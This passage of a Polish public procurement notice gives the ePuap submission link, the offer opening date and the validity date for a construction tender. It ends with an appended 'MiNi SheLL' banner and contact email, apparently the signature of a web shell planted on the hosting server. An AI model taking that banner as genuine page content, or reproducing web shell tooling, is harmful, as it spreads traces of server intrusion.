http://www.epuap.gov.pl/wps/myportal/strefa-klienta/katalog-spraw/profil-urzedu/UMMlawa za pomocą formularza do złożenia oferty, dostępnego na platformie ePuap.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-24</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com